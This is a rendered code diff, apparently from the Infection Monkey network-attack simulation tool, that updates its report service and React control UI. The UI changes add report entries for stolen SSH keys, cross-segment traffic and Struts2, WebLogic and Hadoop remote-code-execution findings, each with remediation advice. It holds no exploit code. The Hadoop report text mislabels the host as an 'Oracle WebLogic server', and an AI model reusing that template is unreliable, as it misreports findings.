elif issue['type'].endswith('_pth') or issue['type'].endswith('_password'): elif issue['type'].endswith('_pth') or issue['type'].endswith('_password'):
issues_byte_array[ReportService.ISSUES_DICT.STOLEN_CREDS.value] = True issues_byte_array[ReportService.ISSUES_DICT.STOLEN_CREDS.value] = True
@ -380,16 +608,19 @@ class ReportService:
return issues_byte_array return issues_byte_array
@staticmethod @staticmethod
def get_warnings_overview(issues): def get_warnings_overview(issues, cross_segment_issues):
warnings_byte_array = [False] * 2 warnings_byte_array = [False] * 2
for machine in issues: for machine in issues:
for issue in issues[machine]: for issue in issues[machine]:
if issue['type'] == 'cross_segment': if issue['type'] == 'island_cross_segment':
warnings_byte_array[ReportService.WARNINGS_DICT.CROSS_SEGMENT.value] = True warnings_byte_array[ReportService.WARNINGS_DICT.CROSS_SEGMENT.value] = True
elif issue['type'] == 'tunnel': elif issue['type'] == 'tunnel':
warnings_byte_array[ReportService.WARNINGS_DICT.TUNNEL.value] = True warnings_byte_array[ReportService.WARNINGS_DICT.TUNNEL.value] = True
if len(cross_segment_issues) != 0:
warnings_byte_array[ReportService.WARNINGS_DICT.CROSS_SEGMENT.value] = True
return warnings_byte_array return warnings_byte_array
@staticmethod @staticmethod
@ -405,12 +636,14 @@ class ReportService:
{'name': 'generated_report'}, {'name': 'generated_report'},
{'$set': {'value': True}}, {'$set': {'value': True}},
upsert=True) upsert=True)
logger.info("Report marked as generated.")
@staticmethod @staticmethod
def get_report(): def get_report():
issues = ReportService.get_issues() issues = ReportService.get_issues()
config_users = ReportService.get_config_users() config_users = ReportService.get_config_users()
config_passwords = ReportService.get_config_passwords() config_passwords = ReportService.get_config_passwords()
cross_segment_issues = ReportService.get_cross_segment_issues()
report = \ report = \
{ {
@ -425,7 +658,8 @@ class ReportService:
'monkey_start_time': ReportService.get_first_monkey_time().strftime("%d/%m/%Y %H:%M:%S"), 'monkey_start_time': ReportService.get_first_monkey_time().strftime("%d/%m/%Y %H:%M:%S"),
'monkey_duration': ReportService.get_monkey_duration(), 'monkey_duration': ReportService.get_monkey_duration(),
'issues': ReportService.get_issues_overview(issues, config_users, config_passwords), 'issues': ReportService.get_issues_overview(issues, config_users, config_passwords),
'warnings': ReportService.get_warnings_overview(issues) 'warnings': ReportService.get_warnings_overview(issues, cross_segment_issues),
'cross_segment_issues': cross_segment_issues
}, },
'glance': 'glance':
{ {
@ -433,6 +667,7 @@ class ReportService:
'exploited': ReportService.get_exploited(), 'exploited': ReportService.get_exploited(),
'stolen_creds': ReportService.get_stolen_creds(), 'stolen_creds': ReportService.get_stolen_creds(),
'azure_passwords': ReportService.get_azure_creds(), 'azure_passwords': ReportService.get_azure_creds(),
'ssh_keys': ReportService.get_ssh_keys()
}, },
'recommendations': 'recommendations':
{ {

View File

@ -1,7 +1,4 @@
{ {
"presets": [ "presets": ["es2015", "stage-0", "react"]
"es2015",
"stage-0",
"react"
]
} }

View File

@ -1,43 +0,0 @@
'use strict';
let path = require('path');
let defaultSettings = require('./defaults');
// Additional npm or bower modules to include in builds
// Add all foreign plugins you may need into this array
// @example:
// let npmBase = path.join(__dirname, '../node_modules');
// let additionalPaths = [ path.join(npmBase, 'react-bootstrap') ];
let additionalPaths = [];
module.exports = {
additionalPaths: additionalPaths,
port: defaultSettings.port,
debug: true,
devtool: 'eval',
output: {
path: path.join(__dirname, '/../dist/assets'),
filename: 'app.js',
publicPath: defaultSettings.publicPath
},
devServer: {
contentBase: './src/',
historyApiFallback: true,
hot: true,
port: defaultSettings.port,
publicPath: defaultSettings.publicPath,
noInfo: false
},
resolve: {
extensions: ['', '.js', '.jsx'],
alias: {
actions: `${defaultSettings.srcPath}/actions/`,
components: `${defaultSettings.srcPath}/components/`,
sources: `${defaultSettings.srcPath}/sources/`,
stores: `${defaultSettings.srcPath}/stores/`,
styles: `${defaultSettings.srcPath}/styles/`,
config: `${defaultSettings.srcPath}/config/` + process.env.REACT_WEBPACK_ENV,
'react/lib/ReactMount': 'react-dom/lib/ReactMount'
}
},
module: {}
};

View File

@ -1,68 +0,0 @@
/**
* Function that returns default values.
* Used because Object.assign does a shallow instead of a deep copy.
* Using [].push will add to the base array, so a require will alter
* the base array output.
*/
'use strict';
const path = require('path');
const srcPath = path.join(__dirname, '/../src');
const dfltPort = 8000;
/**
* Get the default modules object for webpack
* @return {Object}
*/
function getDefaultModules() {
return {
preLoaders: [
{
test: /\.(js|jsx)$/,
include: srcPath,
loader: 'eslint-loader'
}
],
loaders: [
{
test: /\.css$/,
loader: 'style-loader!css-loader'
},
{
test: /\.sass/,
loader: 'style-loader!css-loader!sass-loader?outputStyle=expanded&indentedSyntax'
},
{
test: /\.scss/,
loader: 'style-loader!css-loader!sass-loader?outputStyle=expanded'
},
{
test: /\.less/,
loader: 'style-loader!css-loader!less-loader'
},
{
test: /\.styl/,
loader: 'style-loader!css-loader!stylus-loader'
},
{
test: /\.(png|jpg|gif)$/,
loader: 'url-loader?limit=8192'
},
{
test: /\.woff(2)?(\?v=[0-9]\.[0-9]\.[0-9])?$/,
loader: 'url-loader?limit=10000&mimetype=application/font-woff'
},
{
test: /\.(ttf|eot|svg)(\?v=[0-9]\.[0-9]\.[0-9])?$/,
loader: 'file-loader'
}
]
};
}
module.exports = {
srcPath: srcPath,
publicPath: '/assets/',
port: dfltPort,
getDefaultModules: getDefaultModules
};

View File

@ -1,47 +0,0 @@
'use strict';
let path = require('path');
let webpack = require('webpack');
let baseConfig = require('./base');
let defaultSettings = require('./defaults');
// Add needed plugins here
let BowerWebpackPlugin = require('bower-webpack-plugin');
let config = Object.assign({}, baseConfig, {
entry: [
'webpack-dev-server/client?http://127.0.0.1:' + defaultSettings.port,
'webpack/hot/only-dev-server',
'./src/index'
],
cache: true,
devtool: 'eval-source-map',
plugins: [
new webpack.HotModuleReplacementPlugin(),
new webpack.NoErrorsPlugin(),
new BowerWebpackPlugin({
searchResolveModulesDirectories: false
})
],
module: defaultSettings.getDefaultModules()
});
// Add needed loaders to the defaults here
config.module.loaders.push({
test: /\.(js|jsx)$/,
loader: 'react-hot!babel-loader',
include: [].concat(
config.additionalPaths,
[ path.join(__dirname, '/../src') ]
)
});
// proxy to backend server
config.devServer.proxy = {
'/api': {
target: 'https://localhost:5000',
secure: false
}
};
module.exports = config;

View File

@ -1,42 +0,0 @@
'use strict';
let path = require('path');
let webpack = require('webpack');
let baseConfig = require('./base');
let defaultSettings = require('./defaults');
// Add needed plugins here
let BowerWebpackPlugin = require('bower-webpack-plugin');
let config = Object.assign({}, baseConfig, {
entry: path.join(__dirname, '../src/index'),
cache: false,
devtool: 'sourcemap',
plugins: [
new webpack.optimize.DedupePlugin(),
new webpack.DefinePlugin({
'process.env.NODE_ENV': '"production"'
}),
new BowerWebpackPlugin({
searchResolveModulesDirectories: false
}),
new webpack.optimize.UglifyJsPlugin(),
new webpack.optimize.OccurenceOrderPlugin(),
new webpack.optimize.AggressiveMergingPlugin(),
new webpack.NoErrorsPlugin()
],
module: defaultSettings.getDefaultModules()
});
// Add needed loaders to the defaults here
config.module.loaders.push({
test: /\.(js|jsx)$/,
loader: 'babel',
include: [].concat(
config.additionalPaths,
[ path.join(__dirname, '/../src') ]
)
});
module.exports = config;

View File

@ -1,51 +0,0 @@
'use strict';
let path = require('path');
let srcPath = path.join(__dirname, '/../src/');
let baseConfig = require('./base');
// Add needed plugins here
let BowerWebpackPlugin = require('bower-webpack-plugin');
module.exports = {
devtool: 'eval',
module: {
preLoaders: [
],
loaders: [
{
test: /\.(png|jpg|gif|woff|woff2|css|sass|scss|less|styl)$/,
loader: 'null-loader'
},
{
test: /\.(js|jsx)$/,
loader: 'babel-loader',
include: [].concat(
baseConfig.additionalPaths,
[
path.join(__dirname, '/../src'),
path.join(__dirname, '/../test')
]
)
}
]
},
resolve: {
extensions: [ '', '.js', '.jsx' ],
alias: {
actions: srcPath + 'actions/',
helpers: path.join(__dirname, '/../test/helpers'),
components: srcPath + 'components/',
sources: srcPath + 'sources/',
stores: srcPath + 'stores/',
styles: srcPath + 'styles/',
config: srcPath + 'config/' + process.env.REACT_WEBPACK_ENV
}
},
plugins: [
new BowerWebpackPlugin({
searchResolveModulesDirectories: false
})
]
};

File diff suppressed because it is too large Load Diff

View File

@ -2,11 +2,10 @@
"private": true, "private": true,
"version": "1.0.0", "version": "1.0.0",
"description": "Infection Monkey C&C UI", "description": "Infection Monkey C&C UI",
"main": "",
"scripts": { "scripts": {
"clean": "rimraf dist/*", "clean": "rimraf dist/*",
"copy": "copyfiles -f ./src/index.html ./src/favicon.ico ./dist", "copy": "copyfiles -f ./src/index.html ./src/favicon.ico ./dist",
"dist": "npm run copy & webpack --env=dist", "dist": "webpack --mode production",
"lint": "eslint ./src", "lint": "eslint ./src",
"posttest": "npm run lint", "posttest": "npm run lint",
"release:major": "npm version major && npm publish && git push --follow-tags", "release:major": "npm version major && npm publish && git push --follow-tags",
@ -14,7 +13,7 @@
"release:patch": "npm version patch && npm publish && git push --follow-tags", "release:patch": "npm version patch && npm publish && git push --follow-tags",
"serve": "node server.js --env=dev", "serve": "node server.js --env=dev",
"serve:dist": "node server.js --env=dist", "serve:dist": "node server.js --env=dist",
"start": "node server.js --env=dev", "start": "webpack-dev-server --mode development --open --history-api-fallback --port 8000",
"test": "karma start", "test": "karma start",
"test:watch": "karma start --autoWatch=true --singleRun=false" "test:watch": "karma start --autoWatch=true --singleRun=false"
}, },
@ -22,71 +21,75 @@
"keywords": [], "keywords": [],
"author": "Guardicore", "author": "Guardicore",
"devDependencies": { "devDependencies": {
"babel-core": "^6.26.0", "babel-cli": "^6.26.0",
"babel-eslint": "^6.0.0", "babel-core": "^6.26.3",
"babel-loader": "^6.4.1", "babel-eslint": "^8.2.6",
"babel-loader": "^7.1.5",
"babel-polyfill": "^6.26.0", "babel-polyfill": "^6.26.0",
"babel-preset-env": "^1.7.0",
"babel-preset-es2015": "^6.24.1", "babel-preset-es2015": "^6.24.1",
"babel-preset-react": "^6.24.1", "babel-preset-react": "^6.24.1",
"babel-preset-stage-0": "^6.5.0", "babel-preset-stage-0": "^6.5.0",
"bower-webpack-plugin": "^0.1.9", "bower-webpack-plugin": "^0.1.9",
"chai": "^3.2.0", "chai": "^4.1.2",
"copyfiles": "^1.0.0", "copyfiles": "^2.0.0",
"css-loader": "^0.23.1", "css-loader": "^1.0.0",
"eslint": "^3.0.0", "eslint": "^5.3.0",
"eslint-loader": "^1.0.0", "eslint-loader": "^2.1.0",
"eslint-plugin-react": "^6.0.0", "eslint-plugin-react": "^7.11.1",
"file-loader": "^0.9.0", "file-loader": "^1.1.11",
"glob": "^7.0.0", "glob": "^7.0.0",
"karma": "^1.7.1", "html-loader": "^0.5.5",
"html-webpack-plugin": "^3.2.0",
"karma": "^3.0.0",
"karma-chai": "^0.1.0", "karma-chai": "^0.1.0",
"karma-coverage": "^1.0.0", "karma-coverage": "^1.1.2",
"karma-mocha": "^1.0.0", "karma-mocha": "^1.0.0",
"karma-mocha-reporter": "^2.2.5", "karma-mocha-reporter": "^2.2.5",
"karma-phantomjs-launcher": "^1.0.0", "karma-phantomjs-launcher": "^1.0.0",
"karma-sourcemap-loader": "^0.3.5", "karma-sourcemap-loader": "^0.3.5",
"karma-webpack": "^1.7.0", "karma-webpack": "^3.0.0",
"minimist": "^1.2.0", "minimist": "^1.2.0",
"mocha": "^3.5.3", "mocha": "^5.2.0",
"null-loader": "^0.1.1", "null-loader": "^0.1.1",
"open": "0.0.5", "open": "0.0.5",
"phantomjs-prebuilt": "^2.1.16", "phantomjs-prebuilt": "^2.1.16",
"react-addons-test-utils": "^15.6.2", "react-addons-test-utils": "^15.6.2",
"react-hot-loader": "^1.2.9", "react-hot-loader": "^4.3.4",
"rimraf": "^2.6.2", "rimraf": "^2.6.2",
"style-loader": "^0.13.2", "style-loader": "^0.22.1",
"url-loader": "^0.5.9", "url-loader": "^1.1.0",
"webpack": "^1.15.0", "webpack": "^4.16.5",
"webpack-dev-server": "^1.12.0" "webpack-cli": "^3.1.0",
"webpack-dev-server": "^3.1.5"
}, },
"dependencies": { "dependencies": {
"bootstrap": "^3.3.7", "bootstrap": "3.3.7",
"core-js": "^2.5.5", "core-js": "^2.5.7",
"downloadjs": "^1.4.7", "downloadjs": "^1.4.7",
"fetch": "^1.1.0", "fetch": "^1.1.0",
"js-file-download": "^0.4.1", "js-file-download": "^0.4.1",
"json-loader": "^0.5.7", "json-loader": "^0.5.7",
"jwt-decode": "^2.2.0", "jwt-decode": "^2.2.0",
"moment": "^2.22.1", "moment": "^2.22.2",
"normalize.css": "^4.0.0", "normalize.css": "^8.0.0",
"npm": "^5.8.0", "npm": "^6.3.0",
"prop-types": "^15.6.1", "prop-types": "^15.6.2",
"rc-progress": "^2.2.5", "rc-progress": "^2.2.5",
"react": "^15.6.2", "react": "^16.4.2",
"react-bootstrap": "^0.31.5", "react-bootstrap": "^0.32.1",
"react-copy-to-clipboard": "^5.0.1", "react-copy-to-clipboard": "^5.0.1",
"react-data-components": "^1.2.0", "react-data-components": "^1.2.0",
"react-dimensions": "^1.3.0", "react-dimensions": "^1.3.0",
"react-dom": "^15.6.2", "react-dom": "^16.4.2",
"react-fa": "^4.2.0", "react-fa": "^5.0.0",
"react-graph-vis": "^0.1.4", "react-graph-vis": "^1.0.2",
"react-json-tree": "^0.10.9", "react-json-tree": "^0.11.0",
"react-jsonschema-form": "^0.50.1", "react-jsonschema-form": "^1.0.4",
"react-modal-dialog": "^4.0.7",
"react-redux": "^5.0.7", "react-redux": "^5.0.7",
"react-router-dom": "^4.2.2", "react-router-dom": "^4.3.1",
"react-table": "^6.7.4", "react-table": "^6.8.6",
"react-toggle": "^4.0.1", "react-toggle": "^4.0.1",
"redux": "^3.7.2" "redux": "^4.0.0"
} }
} }

View File

@ -14,11 +14,11 @@ import LicensePage from 'components/pages/LicensePage';
import AuthComponent from 'components/AuthComponent'; import AuthComponent from 'components/AuthComponent';
import LoginPageComponent from 'components/pages/LoginPage'; import LoginPageComponent from 'components/pages/LoginPage';
require('normalize.css/normalize.css'); import 'normalize.css/normalize.css';
require('react-data-components/css/table-twbs.css'); import 'react-data-components/css/table-twbs.css';
require('styles/App.css'); import 'styles/App.css';
require('react-toggle/style.css'); import 'react-toggle/style.css';
require('react-table/react-table.css'); import 'react-table/react-table.css';
let logoImage = require('../images/monkey-icon.svg'); let logoImage = require('../images/monkey-icon.svg');
let infectionMonkeyImage = require('../images/infection-monkey.svg'); let infectionMonkeyImage = require('../images/infection-monkey.svg');

View File

@ -13,6 +13,7 @@ let getGroupsOptions = () => {
image: require('../../images/nodes/' + groupName + '.png') image: require('../../images/nodes/' + groupName + '.png')
}; };
} }
return groupOptions; return groupOptions;
}; };

View File

@ -155,6 +155,14 @@ class PreviewPaneComponent extends AuthComponent {
) )
} }
islandAssetInfo() {
return (
<div>
No info to show
</div>
);
}
assetInfo(asset) { assetInfo(asset) {
return ( return (
<div> <div>
@ -244,8 +252,8 @@ class PreviewPaneComponent extends AuthComponent {
info = this.scanInfo(this.props.item); info = this.scanInfo(this.props.item);
break; break;
case 'node': case 'node':
info = this.props.item.group.includes('monkey', 'manual') ? info = this.props.item.group.includes('monkey', 'manual') ? this.infectedAssetInfo(this.props.item) :
this.infectedAssetInfo(this.props.item) : this.assetInfo(this.props.item); this.props.item.group !== 'island' ? this.assetInfo(this.props.item) : this.islandAssetInfo();
break; break;
case 'island_edge': case 'island_edge':
info = this.islandEdgeInfo(); info = this.islandEdgeInfo();

View File

@ -1,10 +1,9 @@
import React from 'react'; import React from 'react';
import {Col} from 'react-bootstrap'; import {Col, Modal} from 'react-bootstrap';
import {Link} from 'react-router-dom'; import {Link} from 'react-router-dom';
import {Icon} from 'react-fa'; import {Icon} from 'react-fa';
import PreviewPane from 'components/map/preview-pane/PreviewPane'; import PreviewPane from 'components/map/preview-pane/PreviewPane';
import {ReactiveGraph} from 'components/reactive-graph/ReactiveGraph'; import {ReactiveGraph} from 'components/reactive-graph/ReactiveGraph';
import {ModalContainer, ModalDialog} from 'react-modal-dialog';
import {options, edgeGroupToColor} from 'components/map/MapOptions'; import {options, edgeGroupToColor} from 'components/map/MapOptions';
import AuthComponent from '../AuthComponent'; import AuthComponent from '../AuthComponent';
@ -45,7 +44,7 @@ class MapPageComponent extends AuthComponent {
.then(res => res.json()) .then(res => res.json())
.then(res => { .then(res => {
res.edges.forEach(edge => { res.edges.forEach(edge => {
edge.color = edgeGroupToColor(edge.group); edge.color = {'color': edgeGroupToColor(edge.group)};
}); });
this.setState({graph: res}); this.setState({graph: res});
this.props.onStatusChange(); this.props.onStatusChange();
@ -98,14 +97,10 @@ class MapPageComponent extends AuthComponent {
}; };
renderKillDialogModal = () => { renderKillDialogModal = () => {
if (!this.state.showKillDialog) {
return <div />
}
return ( return (
<ModalContainer onClose={() => this.setState({showKillDialog: false})}> <Modal show={this.state.showKillDialog} onHide={() => this.setState({showKillDialog: false})}>
<ModalDialog onClose={() => this.setState({showKillDialog: false})}> <Modal.Body>
<h2>Are you sure you want to kill all monkeys?</h2> <h2><div className="text-center">Are you sure you want to kill all monkeys?</div></h2>
<p style={{'fontSize': '1.2em', 'marginBottom': '2em'}}> <p style={{'fontSize': '1.2em', 'marginBottom': '2em'}}>
This might take a few moments... This might take a few moments...
</p> </p>
@ -122,9 +117,10 @@ class MapPageComponent extends AuthComponent {
Cancel Cancel
</button> </button>
</div> </div>
</ModalDialog> </Modal.Body>
</ModalContainer> </Modal>
) )
}; };
renderTelemetryEntry(telemetry) { renderTelemetryEntry(telemetry) {

View File

@ -22,7 +22,11 @@ class ReportPageComponent extends AuthComponent {
SAMBACRY: 3, SAMBACRY: 3,
SHELLSHOCK: 4, SHELLSHOCK: 4,
CONFICKER: 5, CONFICKER: 5,
AZURE: 6 AZURE: 6,
STOLEN_SSH_KEYS: 7,
STRUTS2: 8,
WEBLOGIC: 9,
HADOOP: 10
}; };
Warning = Warning =
@ -293,6 +297,8 @@ class ReportPageComponent extends AuthComponent {
return x === true; return x === true;
}).length} threats</span>: }).length} threats</span>:
<ul> <ul>
{this.state.report.overview.issues[this.Issue.STOLEN_SSH_KEYS] ?
<li>Stolen SSH keys are used to exploit other machines.</li> : null }
{this.state.report.overview.issues[this.Issue.STOLEN_CREDS] ? {this.state.report.overview.issues[this.Issue.STOLEN_CREDS] ?
<li>Stolen credentials are used to exploit other machines.</li> : null} <li>Stolen credentials are used to exploit other machines.</li> : null}
{this.state.report.overview.issues[this.Issue.ELASTIC] ? {this.state.report.overview.issues[this.Issue.ELASTIC] ?
@ -318,7 +324,16 @@ class ReportPageComponent extends AuthComponent {
<li>Azure machines expose plaintext passwords. (<a <li>Azure machines expose plaintext passwords. (<a
href="https://www.guardicore.com/2018/03/recovering-plaintext-passwords-azure/" href="https://www.guardicore.com/2018/03/recovering-plaintext-passwords-azure/"
>More info</a>)</li> : null} >More info</a>)</li> : null}
{this.state.report.overview.issues[this.Issue.STRUTS2] ?
<li>Struts2 servers are vulnerable to remote code execution. (<a
href="https://cwiki.apache.org/confluence/display/WW/S2-045">
CVE-2017-5638</a>)</li> : null }
{this.state.report.overview.issues[this.Issue.WEBLOGIC] ?
<li>Oracle WebLogic servers are vulnerable to remote code execution. (<a
href="https://nvd.nist.gov/vuln/detail/CVE-2017-10271">
CVE-2017-10271</a>)</li> : null }
{this.state.report.overview.issues[this.Issue.HADOOP] ?
<li>Hadoop/Yarn servers are vulnerable to remote code execution.</li> : null }
</ul> </ul>
</div> </div>
: :
@ -343,7 +358,7 @@ class ReportPageComponent extends AuthComponent {
<li>Weak segmentation - Machines from different segments are able to <li>Weak segmentation - Machines from different segments are able to
communicate.</li> : null} communicate.</li> : null}
{this.state.report.overview.warnings[this.Warning.TUNNEL] ? {this.state.report.overview.warnings[this.Warning.TUNNEL] ?
<li>Weak segmentation - machines were able to communicate over unused ports.</li> : null} <li>Weak segmentation - Machines were able to communicate over unused ports.</li> : null}
</ul> </ul>
</div> </div>
: :
@ -352,6 +367,21 @@ class ReportPageComponent extends AuthComponent {
</div> </div>
} }
</div> </div>
{ this.state.report.overview.cross_segment_issues.length > 0 ?
<div>
<h3>
Segmentation Issues
</h3>
<div>
The Monkey uncovered the following set of segmentation issues:
<ul>
{this.state.report.overview.cross_segment_issues.map(x => this.generateCrossSegmentIssue(x))}
</ul>
</div>
</div>
:
''
}
</div> </div>
); );
} }
@ -414,7 +444,7 @@ class ReportPageComponent extends AuthComponent {
<ScannedServers data={this.state.report.glance.scanned}/> <ScannedServers data={this.state.report.glance.scanned}/>
</div> </div>
<div> <div>
<StolenPasswords data={this.state.report.glance.stolen_creds}/> <StolenPasswords data={this.state.report.glance.stolen_creds.concat(this.state.report.glance.ssh_keys)}/>
</div> </div>
</div> </div>
); );
@ -435,6 +465,27 @@ class ReportPageComponent extends AuthComponent {
return data_array.map(badge_data => <span className="label label-info" style={{margin: '2px'}}>{badge_data}</span>); return data_array.map(badge_data => <span className="label label-info" style={{margin: '2px'}}>{badge_data}</span>);
} }
generateCrossSegmentIssue(crossSegmentIssue) {
return <li>
{'Communication possible from ' + crossSegmentIssue['source_subnet'] + ' to ' + crossSegmentIssue['target_subnet']}
<CollapsibleWellComponent>
<ul>
{crossSegmentIssue['issues'].map(x =>
x['is_self'] ?
<li>
{'Machine ' + x['hostname'] + ' has both ips: ' + x['source'] + ' and ' + x['target']}
</li>
:
<li>
{'IP ' + x['source'] + ' (' + x['hostname'] + ') connected to IP ' + x['target']
+ ' using the services: ' + Object.keys(x['services']).join(', ')}
</li>
)}
</ul>
</CollapsibleWellComponent>
</li>;
}
generateShellshockPathListBadges(paths) { generateShellshockPathListBadges(paths) {
return paths.map(path => <span className="label label-warning" style={{margin: '2px'}}>{path}</span>); return paths.map(path => <span className="label label-warning" style={{margin: '2px'}}>{path}</span>);
} }
@ -524,6 +575,22 @@ class ReportPageComponent extends AuthComponent {
); );
} }
generateSshKeysIssue(issue) {
return (
<li>
Protect <span className="label label-success">{issue.ssh_key}</span> private key with a pass phrase.
<CollapsibleWellComponent>
The machine <span className="label label-primary">{issue.machine}</span> (<span
className="label label-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to a <span
className="label label-danger">SSH</span> attack.
<br/>
The Monkey authenticated over the SSH protocol with private key <span
className="label label-success">{issue.ssh_key}</span>.
</CollapsibleWellComponent>
</li>
);
}
generateRdpIssue(issue) { generateRdpIssue(issue) {
return ( return (
<li> <li>
@ -624,7 +691,7 @@ class ReportPageComponent extends AuthComponent {
); );
} }
generateCrossSegmentIssue(issue) { generateIslandCrossSegmentIssue(issue) {
return ( return (
<li> <li>
Segment your network and make sure there is no communication between machines from different segments. Segment your network and make sure there is no communication between machines from different segments.
@ -652,6 +719,58 @@ class ReportPageComponent extends AuthComponent {
); );
} }
generateStruts2Issue(issue) {
return (
<li>
Upgrade Struts2 to version 2.3.32 or 2.5.10.1 or any later versions.
<CollapsibleWellComponent>
Struts2 server at <span className="label label-primary">{issue.machine}</span> (<span
className="label label-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to <span
className="label label-danger">remote code execution</span> attack.
<br/>
The attack was made possible because the server is using an old version of Jakarta based file upload
Multipart parser. For possible work-arounds and more info read <a
href="https://cwiki.apache.org/confluence/display/WW/S2-045"
>here</a>.
</CollapsibleWellComponent>
</li>
);
}
generateWebLogicIssue(issue) {
return (
<li>
Install Oracle <a href="http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html">
critical patch updates.</a> Or change server version. Vulnerable versions are
10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.
<CollapsibleWellComponent>
Oracle WebLogic server at <span className="label label-primary">{issue.machine}</span> (<span
className="label label-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to <span
className="label label-danger">remote code execution</span> attack.
<br/>
The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware
(subcomponent: WLS Security).
</CollapsibleWellComponent>
</li>
);
}
generateHadoopIssue(issue) {
return (
<li>
Run Hadoop in secure mode (<a href="http://hadoop.apache.org/docs/current/hadoop-project-dist/hadoop-common/SecureMode.html">
add Kerberos authentication</a>).
<CollapsibleWellComponent>
Oracle WebLogic server at <span className="label label-primary">{issue.machine}</span> (<span
className="label label-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to <span
className="label label-danger">remote code execution</span> attack.
<br/>
The attack was made possible due to default Hadoop/Yarn configuration being insecure.
</CollapsibleWellComponent>
</li>
);
}
generateIssue = (issue) => { generateIssue = (issue) => {
@ -672,6 +791,9 @@ class ReportPageComponent extends AuthComponent {
case 'ssh': case 'ssh':
data = this.generateSshIssue(issue); data = this.generateSshIssue(issue);
break; break;
case 'ssh_key':
data = this.generateSshKeysIssue(issue);
break;
case 'rdp': case 'rdp':
data = this.generateRdpIssue(issue); data = this.generateRdpIssue(issue);
break; break;
@ -687,7 +809,7 @@ class ReportPageComponent extends AuthComponent {
case 'conficker': case 'conficker':
data = this.generateConfickerIssue(issue); data = this.generateConfickerIssue(issue);
break; break;
case 'cross_segment': case 'island_cross_segment':
data = this.generateCrossSegmentIssue(issue); data = this.generateCrossSegmentIssue(issue);
break; break;
case 'tunnel': case 'tunnel':
@ -696,6 +818,15 @@ class ReportPageComponent extends AuthComponent {
case 'azure_password': case 'azure_password':
data = this.generateAzureIssue(issue); data = this.generateAzureIssue(issue);
break; break;
case 'struts2':
data = this.generateStruts2Issue(issue);
break;
case 'weblogic':
data = this.generateWebLogicIssue(issue);
break;
case 'hadoop':
data = this.generateHadoopIssue(issue);
break;
} }
return data; return data;
}; };

View File

@ -1,7 +1,6 @@
import React from 'react'; import React from 'react';
import {Col} from 'react-bootstrap'; import {Col, Modal} from 'react-bootstrap';
import {Link} from 'react-router-dom'; import {Link} from 'react-router-dom';
import {ModalContainer, ModalDialog} from 'react-modal-dialog';
import AuthComponent from '../AuthComponent'; import AuthComponent from '../AuthComponent';
class StartOverPageComponent extends AuthComponent { class StartOverPageComponent extends AuthComponent {
@ -27,14 +26,10 @@ class StartOverPageComponent extends AuthComponent {
}; };
renderCleanDialogModal = () => { renderCleanDialogModal = () => {
if (!this.state.showCleanDialog) {
return <div />
}
return ( return (
<ModalContainer onClose={() => this.setState({showCleanDialog: false})}> <Modal show={this.state.showCleanDialog} onHide={() => this.setState({showCleanDialog: false})}>
<ModalDialog onClose={() => this.setState({showCleanDialog: false})}> <Modal.Body>
<h2>Reset environment</h2> <h2><div className="text-center">Reset environment</div></h2>
<p style={{'fontSize': '1.2em', 'marginBottom': '2em'}}> <p style={{'fontSize': '1.2em', 'marginBottom': '2em'}}>
Are you sure you want to reset the environment? Are you sure you want to reset the environment?
</p> </p>
@ -60,9 +55,10 @@ class StartOverPageComponent extends AuthComponent {
Cancel Cancel
</button> </button>
</div> </div>
</ModalDialog> </Modal.Body>
</ModalContainer> </Modal>
) )
}; };
render() { render() {

View File

@ -1,8 +1,9 @@
import React from 'react'; import React from 'react';
import {Col} from 'react-bootstrap'; import {Button, Col} from 'react-bootstrap';
import JSONTree from 'react-json-tree' import JSONTree from 'react-json-tree'
import {DataTable} from 'react-data-components'; import {DataTable} from 'react-data-components';
import AuthComponent from '../AuthComponent'; import AuthComponent from '../AuthComponent';
import download from 'downloadjs'
const renderJson = (val) => <JSONTree data={val} level={1} theme="eighties" invertTheme={true} />; const renderJson = (val) => <JSONTree data={val} level={1} theme="eighties" invertTheme={true} />;
const renderTime = (val) => val.split('.')[0]; const renderTime = (val) => val.split('.')[0];
@ -28,21 +29,47 @@ class TelemetryPageComponent extends AuthComponent {
.then(res => this.setState({data: res.objects})); .then(res => this.setState({data: res.objects}));
}; };
downloadIslandLog = () => {
this.authFetch('/api/log/island/download')
.then(res => res.json())
.then(res => {
let filename = 'Island_log'
let logContent = (res['log_file']);
download(logContent, filename, 'text/plain');
});
};
render() { render() {
return ( return (
<Col xs={12} lg={8}> <div>
<h1 className="page-title">Log</h1> <div>
<div className="data-table-container"> <Col xs={12} lg={8}>
<DataTable <h1 className="page-title">Log</h1>
keys="name" <div className="data-table-container">
columns={columns} <DataTable
initialData={this.state.data} keys="name"
initialPageLength={20} columns={columns}
initialSortBy={{ prop: 'timestamp', order: 'descending' }} initialData={this.state.data}
pageLengthOptions={[ 20, 50, 100 ]} initialPageLength={20}
/> initialSortBy={{ prop: 'timestamp', order: 'descending' }}
</div> pageLengthOptions={[ 20, 50, 100 ]}
</Col> />
</div>
</Col>
</div>
<div>
<Col xs={12} lg={8}>
<h1 className="page-title"> Monkey Island Logs </h1>
<div className="text-center" style={{marginBottom: '20px'}}>
<p style={{'marginBottom': '2em', 'fontSize': '1.2em'}}> Download Monkey Island internal log file </p>
<Button bsSize="large" onClick={()=> {
this.downloadIslandLog();
}}>
<i className="glyphicon glyphicon-download"/> Download </Button>
</div>
</Col>
</div>
</div>
); );
} }
} }

View File

@ -8,9 +8,6 @@
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
</head> </head>
<body> <body>
<div id="app">Loading...</div> <div id="app"></div>
<script>__REACT_DEVTOOLS_GLOBAL_HOOK__ = parent.__REACT_DEVTOOLS_GLOBAL_HOOK__</script>
<script type="text/javascript" src="/assets/app.js"></script>
</body> </body>
</html> </html>

View File

@ -1,7 +1,7 @@
import StandardConfig from './StandardConfig'; import StandardConfig from './StandardConfig';
import AwsConfig from './AwsConfig'; import AwsConfig from './AwsConfig';
const SERVER_CONFIG_JSON = require('json-loader!../../../server_config.json'); const SERVER_CONFIG_JSON = require('../../../server_config.json');
const CONFIG_DICT = const CONFIG_DICT =
{ {

View File

